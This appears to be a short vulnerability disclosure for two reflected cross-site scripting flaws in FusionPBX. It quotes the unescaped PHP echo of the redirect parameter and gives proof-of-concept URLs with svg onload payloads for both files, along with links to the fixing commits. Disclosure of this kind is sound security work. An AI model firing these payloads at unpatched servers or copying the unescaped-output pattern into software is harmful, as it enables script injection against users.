Cross-site scripting (XSS) vulnerability in file app/xml_cdr/xml_cdr_search.php line 63 allows remote attackers to inject arbitrary web script or HTML via the redirect parameter.
...
if (strlen(check_str($_GET['redirect'])) > 0) {
echo "<form method='get' action='" . $_GET['redirect'] . ".php'>\n";
}
...Proof of concept:
https://domain/app/xml_cdr/xml_cdr_search.php?redirect=123%27%3E%3Csvg/onload=alert(document.domain)%3E%3Ca+href%3d%27
Fixed: https://github.com/fusionpbx/fusionpbx/commit/f3047c83f3022a4780dca95ed7bccbf3a6fa868e
Cross-site scripting (XSS) vulnerability in file app/fax/fax_files.php allows remote attackers to inject arbitrary web script or HTML via the id parameter.
Proof of concept:
https://domain/app/fax/fax_files.php?id=123%27%3E%3Csvg/onload=alert(document.domain)%3E%3Ca+href%3d%27
Fixed: https://github.com/fusionpbx/fusionpbx/commit/72a5ce4d2d6bc0ec0e72bbfb76487e4761f292c5